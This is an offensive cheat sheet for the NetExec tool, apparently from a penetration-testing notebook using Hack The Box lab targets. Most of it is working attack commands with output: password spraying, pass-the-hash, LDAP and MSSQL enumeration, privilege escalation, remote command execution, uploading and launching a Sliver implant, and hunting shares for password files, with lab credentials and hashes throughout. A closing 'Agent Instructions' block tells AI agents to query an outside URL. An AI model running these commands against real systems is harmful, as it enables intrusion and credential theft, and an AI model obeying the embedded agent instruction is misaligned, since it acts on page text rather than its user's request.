# NetExec

### SSH

* attempt ssh authentication to multiple hosts with one set of credentials

```
./nxc ssh targets.txt -u james -p password123
./nxc ssh targets.txt -u balthazar -p 'password123'
./nxc ssh targets.txt -u root -p asdfghjkl
```

* attempt ssh auth to any host in a subnet with one set of credentials

```
./nxc ssh 172.16.1.0/24 -u james -p password123
```

### WINRM

* attempt winrm authentication to multiple hosts with one set of credentials

```
./nxc winrm targets.txt -u balthazar -p 'abc123!!!'
# domain authentication
./nxc winrm targets.txt -u 'HTB.local\balthazar' -p 'abc123!!!' 
./nxc winrm targets.txt -u 'HTB.local\james' -p password123
```

* attempt winrm authentication to a domain with a username and hash

```
./nxc winrm targets.txt -d HTB.local -u blake -H 12f18eteb6f8187fa52f3f729896bbb7
./nxc winrm targets.txt -u Administrator -H b99ed3c3d34c4576bcd33c76420be934
```

* winrm with a single username and a password wordlist

```
./nxc winrm 172.16.1.101 -u dan.hard -p 172.16.1.101/passwordlist.txt 
```

### SMB

* attempt smb authentication to multiple hosts with one set of credentials

```
./nxc smb targets.txt -u 'HTB.local\james' -p password123
```

* attempt ssh authentication with a keyfile instead of a password

```
./nxc ssh 172.16.1.0/24 -u root --key-file ./10.10.110.100/ssh/id_rsa -p ''
```

* attempt smb auth to any host in a subnet with anonymous logon

```
./nxc smb 172.16.1.0/24 -u anonymous -p ''
```

* smb authentication to a domain with a specific username and attempt a password wordlist

```
./nxc smb 172.16.1.13 -d DANTE.local -u 'gerald' -p /usr/share/seclists/Passwords/2020-200_most_used_passwords.txt 
```

* attempt to authenticate with a known/potential password against a username list

```
./nxc smb 10.10.11.35 -d cicada.htb -u ~/Documents/htb/cicada/loot/users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] CICADA\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 

```

### MSSQL

* MSSQL Enumeration with netexec
* Permissions enumeration

```
nxc mssql $ip -u external_user -p 'password123' -M mssql_priv                     
nxc mssql $ip -u external_user -p 'password123' -M mssql_priv --local-auth
```

* Attempt to enumerate user impersonation

```
nxc mssql $ip -u external_user -p 'password123' -M enum_impersonate --local-auth
```

* enumerate users with active login sessions

```
nxc mssql $ip -u external_user -p 'password123' -M enum_logins --local-auth
```

* attempt to priv esc with mssql

```
nxc mssql $ip -u external_user -p 'password123' -M mssql_priv -o Action=privesc  --local-auth
```

* Access MSSQL and run a command with a password

```
./nxc mssql 172.16.1.5 -u sophie -p thisisagoodpassword-X whoami --local-auth
MSSQL       172.16.1.5      1433   DANTE-SQL01      [*] Windows 10.0 Build 14393 (name:DANTE-SQL01) (domain:DANTE-SQL01)
MSSQL       172.16.1.5      1433   DANTE-SQL01      [+] sophie:thisisagoodpassword(Pwn3d!)
MSSQL       172.16.1.5      1433   DANTE-SQL01      [+] Executed command via mssqlexec
MSSQL       172.16.1.5      1433   DANTE-SQL01      nt service\mssql$sqlexpress
```

* kick off a sliver implant in the background

```
./nxc mssql 172.16.1.5 -u sophie -p thisisagoodpassword -X 'cmd.exe /c start /b C:\Windows\System32\spool\drivers\color\security.exe' --local-auth
[*] Session b00d3dc6 dante-dc01 - 10.10.14.3:33086 (DANTE-SQL01) - windows/amd64 - Sun, 19 May 2024 13:48:24 EDT
```

### Put file

<pre><code><strong>./nxc smb 172.16.1.13 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:d0629f5539666892bf9ba9b34daa125c --put-file /opt/wmiexec2/RuntimeBroker.exe \\xampp\\apache\\bin\\iconv\\RuntimeBroker.exe
</strong>
./nxc mssql 172.16.1.5 -u sophie -p thisisapassword --put-file /home/ubuntu/Documents/htb/dante/security.exe 'C:\Windows\System32\spool\drivers\color\security.exe' --local-auth

</code></pre>

### LDAP

* attempt authentication to ldap with a username list and a valid password

```
./nxc ldap 10.10.11.35 -d cicada.htb -u ~/Documents/htb/cicada/loot/users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' 
```

* list of users and computers with flag TRUSTED\_FOR\_DELEGATION

```
./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --trusted-for-delegation
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        CICADA-DC$
```

* get admin count and their usernames

```
./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --admin-count           
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        Administrator
LDAP        10.10.11.35     389    CICADA-DC        Administrators
LDAP        10.10.11.35     389    CICADA-DC        Print Operators
LDAP        10.10.11.35     389    CICADA-DC        Backup Operators
LDAP        10.10.11.35     389    CICADA-DC        Replicator
LDAP        10.10.11.35     389    CICADA-DC        krbtgt
LDAP        10.10.11.35     389    CICADA-DC        Domain Controllers
LDAP        10.10.11.35     389    CICADA-DC        Schema Admins
LDAP        10.10.11.35     389    CICADA-DC        Enterprise Admins
LDAP        10.10.11.35     389    CICADA-DC        Domain Admins
LDAP        10.10.11.35     389    CICADA-DC        Server Operators
LDAP        10.10.11.35     389    CICADA-DC        Account Operators
LDAP        10.10.11.35     389    CICADA-DC        Read-only Domain Controllers
LDAP        10.10.11.35     389    CICADA-DC        Key Admins
LDAP        10.10.11.35     389    CICADA-DC        Enterprise Key Admins
LDAP        10.10.11.35     389    CICADA-DC        Dev Support
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars
```

* get users on the box, passwords can be in the comment field

```
./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        [*] Enumerated 8 domain users: CICADA
LDAP        10.10.11.35     389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-      
LDAP        10.10.11.35     389    CICADA-DC        Administrator                 2024-08-26 20:08:03 2       Built-in account for administering the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        Guest                         2024-08-28 17:26:56 2       Built-in account for guest access to the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        krbtgt                        2024-03-14 11:14:10 3       Key Distribution Center Service Account
LDAP        10.10.11.35     389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0                          
LDAP        10.10.11.35     389    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0  

```

* get groups on the machine via ldap

```
./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --groups
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        Administrators
LDAP        10.10.11.35     389    CICADA-DC        Users
LDAP        10.10.11.35     389    CICADA-DC        Guests
LDAP        10.10.11.35     389    CICADA-DC        Print Operators
LDAP        10.10.11.35     389    CICADA-DC        Backup Operators
LDAP        10.10.11.35     389    CICADA-DC        Replicator
LDAP        10.10.11.35     389    CICADA-DC        Remote Desktop Users
LDAP        10.10.11.35     389    CICADA-DC        Network Configuration Operators
LDAP        10.10.11.35     389    CICADA-DC        Performance Monitor Users
LDAP        10.10.11.35     389    CICADA-DC        Performance Log Users
LDAP        10.10.11.35     389    CICADA-DC        Distributed COM Users
LDAP        10.10.11.35     389    CICADA-DC        IIS_IUSRS
LDAP        10.10.11.35     389    CICADA-DC        Cryptographic Operators
LDAP        10.10.11.35     389    CICADA-DC        Event Log Readers
LDAP        10.10.11.35     389    CICADA-DC        Certificate Service DCOM Access
LDAP        10.10.11.35     389    CICADA-DC        RDS Remote Access Servers
LDAP        10.10.11.35     389    CICADA-DC        RDS Endpoint Servers
LDAP        10.10.11.35     389    CICADA-DC        RDS Management Servers
LDAP        10.10.11.35     389    CICADA-DC        Hyper-V Administrators
LDAP        10.10.11.35     389    CICADA-DC        Access Control Assistance Operators
LDAP        10.10.11.35     389    CICADA-DC        Remote Management Users
--snip--
```

* enumerate domain controllers

```
./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --dc-list
```

* get active users (non expired) via ldap

```
./nxc ldap 10.10.11.35 -d cicada.htb -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --active-users
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] CICADA\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        [*] Total records returned: 7, total 1 user(s) disabled
LDAP        10.10.11.35     389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-      
LDAP        10.10.11.35     389    CICADA-DC        Administrator                 2024-08-26 20:08:03 2       Built-in account for administering the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        Guest                         2024-08-28 17:26:56 2       Built-in account for guest access to the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 2                          
LDAP        10.10.11.35     389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0                          
LDAP        10.10.11.35     389    CICADA-DC        david.orelious                2024-03-14 12:17:29 0       Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 0    

```

* get bloodhound scan via ldap remote with net-exec

```
./nxc ldap 10.10.11.35 -d cicada.htb --dns-server 10.10.11.35 -u 'CICADA\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --bloodhound
```

### Share Spidering

Search share contents for keywords (e.g. passwords in files):

```bash
nxc smb TARGET -d DOMAIN -u USER -p 'PASS' --spider SHARE_NAME --content --pattern "passw"

# Example:
nxc smb file01 -d NEXURA -u hwilliam -p 'dealer-screwed-gym1' --spider PRIVATE --content --pattern "passw"
SMB  //172.16.119.10/PRIVATE/hwilliam/Online passwords.xlsx [lastm:'2025-04-29 18:16' size:7360]
```

### Download File from Share

```bash
nxc smb TARGET -d DOMAIN -u USER -p 'PASS' --share SHARE --get-file '\path\to\file.xlsx' /tmp/local_file.xlsx

# Example:
nxc smb file01 -d NEXURA -u hwilliam -p 'dealer-screwed-gym1' --share PRIVATE --get-file '\hwilliam\Online passwords.xlsx' /tmp/passwords.xlsx
```

### Read Remote Files via Command Execution

Use `-X` (PowerShell) to read files on the remote target:

```bash
nxc smb TARGET -u USER -H "NTHASH" --share C$ -X "type C:\path\to\file.txt"
```

### Pass the Hash with NT Hash Only

When you only have the NT hash (no LM hash), prefix with a colon:

```bash
nxc smb TARGET -u Administrator -H ':30B3783CE2ABF1AF70F77D0660CF3453' --shares
```

### PowerHuntShares — Automated Share Hunting

For large-scale share discovery and hunting, use PowerHuntShares:

```powershell
Import-Module .\PowerHuntShares.psm1
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public
```

### Pcredz — Extract Credentials from PCAPs

```bash
# Docker
docker build -t pcredz .
docker run --rm -v $(pwd):/data pcredz -f capture.pcapng

# Direct
python3 Pcredz -t -v -f /path/to/capture.pcapng
```

### Threading Through Tunnels

When running nxc through sliver tunnels or port forwards, limit threads to avoid killing the tunnel:

```bash
nxc smb 127.0.0.1 -u david -d DOMAIN -H HASH --shares --port 4445 -t 1
```

***

### Execution of Commands

* execute cmd.exe command

```
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -x whoami
```

* execute powershell command

```
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -X whoami
```

### mmcexec Execution

* cmd.exe and powershell.exe

```
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method mmcexec -x whoami
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method mmcexec -X whoami
```

### atexec Scheduled task execution

* cmd.exe and powershell.exe

```
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method atexec -x dir
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method atexec -X dir
```

### smbexec command execution

* cmd.exe and powershell.exe

```
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method smbexec -x dir
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method smbexec -X dir
```

### wmiexec command execution

* cmd.exe and powershell.exe

```
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method wmiexec -x dir
./nxc smb 10.10.11.35 -d cicada.htb -u 'CICADA\emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --exec-method wmiexec -X dir
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/tool-guides/netexec.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.